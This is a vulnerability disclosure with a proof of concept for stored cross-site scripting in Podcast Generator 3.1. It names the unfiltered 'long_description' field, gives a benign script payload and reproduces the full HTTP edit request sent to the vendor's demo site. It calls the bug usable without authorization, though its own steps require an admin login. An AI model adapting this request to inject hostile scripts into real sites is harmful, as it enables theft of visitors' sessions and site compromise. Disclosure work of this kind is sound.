Podcast Generator 3.1 - 'Long Description' Persistent Cross-Site Scripting (XSS)

# Exploit Title: Podcast Generator 3.1 - 'Long Description' Persistent Cross-Site Scripting (XSS)
# Date: 13/05/2021
# Exploit Author: Ayşenur KARAASLAN
# Vendor Homepage: https://podcastgenerator.net/demoV2/
# Software Link: https://podcastgenerator.net/download and https://github.com/PodcastGenerator/PodcastGenerator/archive/v3.1.1.zip
# Version: < 3.1.1
# CVE: N/A

Podcast Generator is an open source Content Management System written in PHP and specifically designed for podcast publishing.

#Description
The following is PoC to use the XSS bug with unauthorized user.

1. Login to your admin account.
2. "Upload New Episode" or "Edit" field has got "Long Description". Long Description field is not filtered.  It is possible to place JavaScript code.
3. Click the Home button
4. Click "More" button of created or edited episode.

# Vulnerable Parameter Type: POST
# Vulnerable Parameter: long_description
# Attack Pattern: <script>prompt("Aysenur-PoC")</script>

#PoC
HTTP Request:

POST /demoV2/pg/?p=admin&do=edit&c=ok HTTP/1.1
Host: podcastgenerator.net
Cookie: PHPSESSID=2k93317b1dcraih0ti3p8rehc4;
_ga=GA1.2.2015734934.1620928725; _gid=GA1.2.1455863373.1620928725
Content-Length: 1590
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: https://podcastgenerator.net
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundaryMJiUJ3BGzyG5zwxd
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: frame
Referer:
https://podcastgenerator.net/demoV2/pg/?p=admin&do=edit&=episode&name=aysenurxss-poc.jpg
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="userfile"

aysenurxss-poc.jpg
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="title"

Aysenur-PoC
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="description"

poc
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="countdown"

255
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="category[]"

about
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="Day"

13
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="Month"

5
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="Year"

2021
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="Hour"

14
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="Minute"

29
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="long_description"

<script>prompt("aysenur-xss")</script>
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="keywords"

poc
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="explicit"

no
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="auth_name"

aysenur
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="auth_email"

[email protected]
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd--